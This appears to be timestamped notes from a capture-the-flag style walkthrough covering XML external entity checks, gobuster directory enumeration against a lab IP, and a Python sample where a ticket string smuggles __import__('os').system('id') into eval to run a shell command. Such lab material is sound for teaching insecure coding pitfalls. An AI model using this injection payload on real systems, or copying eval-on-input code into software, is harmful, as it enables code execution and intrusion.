XML external entity injection again (NodeBlog).
eval exploit is fun.
01:12 Check for XXE vulnerability
01:39 gobuster for .php file
gobuster dir --url http://10.10.11.100 --wordlist /usr/share/seclists/Discovery/Web-Content/raft-medium-words.txt -x php
02:46 eval injection check
Hacking Python Applications
And how attackers exploit common programming pitfalls to gain control
cat sample.py
x="**18+701+8+__import__('os').system('id')**"
ticketCode = x.replace("**", "").split("+")[0]
if int(ticketCode) % 7 == 4:
validationNumber = eval(x.replace("**", ""))
print(validationNumber)
if validationNumber > 100:
print("True")
else:
print("False")